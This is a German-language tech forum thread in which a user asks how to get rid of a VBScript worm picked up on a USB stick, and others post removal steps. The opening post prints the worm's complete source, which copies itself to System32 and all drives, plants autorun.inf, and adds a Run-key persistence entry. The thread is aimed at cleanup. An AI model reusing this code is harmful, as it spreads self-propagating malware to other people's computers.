Ergebnis 1 bis 4 von 4
  1. #1
    Stanley Jobson
    Registriert seit
    23.06.2009
    Beiträge
    711

    Standard Was macht die Datei und wie bekomme ich sie wieder los?

    War heute an einen fremden Computer und habe mir folgenden unsichbare VBS mit auf meine USB-stick bekommen(hier der Code):
    Code:
    'Mutation of Trojan virus.
    'My name is Datei.vbs
    On error resume next
    Dim mysource,winpath,flashdrive,fs,mf,atr,tf,rg,nt,check,sd,oldname,newname,rgname
    Set fs = createobject("Scripting.FileSystemObject")
    Set wn = WScript.CreateObject("WScript.Network")
    Set mf = fs.getfile(Wscript.ScriptFullname)
    oldname=CStr(fs.getfilename(Wscript.ScriptFullname))
    newname = wn.ComputerName & ".vbs"
    rgname = Replace(newname,".vbs","")
    atr = "[autorun]"&vbcrlf&"shellexecute=wscript.exe Datei.vbs"
    dim text,size
    size = mf.size
    check = mf.drive.drivetype
    Set text=mf.openastextstream(1,-2)
    do while not text.atendofstream
    mysource=mysource&text.readline
    mysource=mysource & vbcrlf
    Loop
    mysource=Replace(mysource,oldname,newname)
    do
    Set winpath = fs.getspecialfolder(0)
    Set tf = fs.getfile(winpath & "\SYSTEM32\" & newname)
    tf.attributes = 32
    Set tf=fs.createtextfile(winpath & "\SYSTEM32\" & newname,2,true)
    tf.write mysource
    tf.close
    Set tf = fs.getfile(winpath & "\SYSTEM32\" & newname)
    tf.attributes = 39
    For each flashdrive in fs.drives
    If (flashdrive.drivetype = 1 or flashdrive.drivetype = 2) and flashdrive.path <> "A:" Then
    Set tf=fs.getfile(flashdrive.path &"\Datei01.vbs")
    tf.attributes =32
    Set tf=fs.createtextfile(flashdrive.path &"\Datei01.vbs",2,true)
    tf.write mysource
    tf.close
    Set tf=fs.getfile(flashdrive.path &"\Datei01.vbs")
    tf.attributes =39
    Set tf =fs.getfile(flashdrive.path &"\autorun.inf")
    tf.attributes = 32
    Set tf=fs.createtextfile(flashdrive.path &"\autorun.inf",2,true)
    tf.write atr
    tf.close
    Set tf =fs.getfile(flashdrive.path &"\autorun.inf")
    tf.attributes=39
    End If
    next
    Set rg = createobject("WScript.Shell")
    rg.regwrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\" & rgname & "",winpath&"\SYSTEM32\" & newname
    rg.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Window Title","Hacked by " & Replace(oldname, ".vbs","")
    if check <> 1 then
    Wscript.sleep 120000
    End if
    loop while check<>1
    Set sd = createobject("Wscript.shell")
    sd.run winpath&"\explorer.exe /e,/select, "&Wscript.ScriptFullname
    Also kann mir mal jemand kurz erzählen wie ich das Ding wieder loskrieg. Meine Virensoftware hat nicht angeschlagen, daher denke ich mal das es über die Autorun.inf ausgeführt wurde, nachdem ich den Stick an meine PC gemacht habe.

  2. #2

    Standard

    1. Vorerst keine USB-Sticks und -Platten an den Rechner anschließen, eventuell angeschlossene trennen.

    2. Im Explorer im Menü Extras -> Ordneroptionen -> Ansicht setze folgende Einstellungen:
    • Erweiterungen bei bekannten Dateitypen ausblenden -> Haken weg
    • Geschützte Systemdateien ausblenden -> Haken weg
    • Inhalte von Systemordnern anzeigen -> Haken setzen (diese Option ist bei Windows 2000 nicht vorhanden)
    • Versteckte Dateien und Ordner -> Alle Dateien und Ordner anzeigen


    3. Taskmanager: alle laufenden Prozesse wscript.exe bzw. cscript.exe beenden.

    4. Die schon erkannte VBS-Datei löschen.

    5. Deine Festplatten nach Dateien mit dme Namen autorun.inf absuchen. Dabei drauf achten, dass alles durchsucht wird, "weitere Optionen" entsprechend setzen. Die ebenfalls löschen.

    6. Mit Hijackthis eben nach der besagten vbs Datei suchen und entfernen

    7. Damit sollte der Rechner selber erledigt sein, nun kommen die USB-Laufwerke dran. Um beim Anschluss eine Neuinfektion zu verhindern, die Shift-Taste gedrückt halten, das verhindert den Autorun. Zusätzlich kannst Du auch vorher in system32 die wscript.exe umbenennen, das aber am Ende wieder rückgängig machen, sie ist ein wichtiger Teil von Windows.

    8. Auf allen USB-Geräten nun nach Kopien dieser vbs-Datei und autorun.inf-Dateien suchen und die ebenfalls löschen. dabei ebenfalls die Suchoptionen beachten.

    [...]monkey see monkey do
    dont ever make the first move
    just let em' come to you
    cause they always gunna see and do what the other one do
    so let em' come to you
    the rest of us follow suit
    monkey see monkey do
    [...]


  3. #3
    Kevin Mitnick Avatar von big earl
    Registriert seit
    22.01.2007
    Beiträge
    1.003

    Standard

    Wie geil ist das denn, xD

    Genau diesen VBS "Wurm" durfte ich seinerzeit ca. 100x von i-welchen Festplatten und USB Sticks löschen, weil i-ein Hornoxe auf die Idee gekommen ist, ihn auf den offenen Schulrechnern zu starten

    Mal abgesehen davon, dass der sich bei jedem Starten in den System32 und auf jeden externen Datenträger kopiert, schreibt er sich auch noch in den Autostart bzw. in die Autostart.ini, der jeweiligen Partition

    Und nun kommt die Hauptaufgabe: Der Titelleiste des InternetExplorers folgendes anhängen:
    "- Hacked by [Ehemaliger PC Name]"

    Lösche einfach die neusten VBS Dateien im Sys32 Ordner, sowie die unsichtbare Datei auf all deinen Partitionen, also auch C:,D: und allen USB Sticks, zudem müsste ein reg. Eintrag unter "..\CurrentVersion\Run" existieren

    Zuletzt noch unter:
    Code:
    HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\
    den Eintrag:
    Code:
    Window Title
    löschen und fertig ist das ganze
    Jabber: bigearl@jabber.ccc.de

  4. #4
    Stanley Jobson
    Registriert seit
    23.06.2009
    Beiträge
    711

    Standard

    Ok danke.
    Bis auf Hijackthis habe ich schon alles gemacht.
    War vorhin einfach nur erschrocken, das ich eine vbs datei drauf habe und keine Zeit. Also danke für die Hilfe.

    Edit: Ok war doch nur auf den USB-Stick, habe nichts im System gefunden. habe jetzt zweimal gesucht.
    Geändert von Boarder (30.11.2010 um 15:32 Uhr)

Ähnliche Themen

  1. Antworten: 6
    Letzter Beitrag: 17.09.2009, 13:36
  2. QIP Pw vergessen...Wie bekomme ich es wieder?
    Von NèóN300 im Forum Sonstiges
    Antworten: 5
    Letzter Beitrag: 09.04.2009, 02:16
  3. Wie man Banned Steam Accs wieder flott macht.
    Von o_O im Forum Biete Tutorials
    Antworten: 24
    Letzter Beitrag: 20.07.2008, 15:38

Stichworte

Berechtigungen

  • Neue Themen erstellen: Nein
  • Themen beantworten: Nein
  • Anhänge hochladen: Nein
  • Beiträge bearbeiten: Nein
  •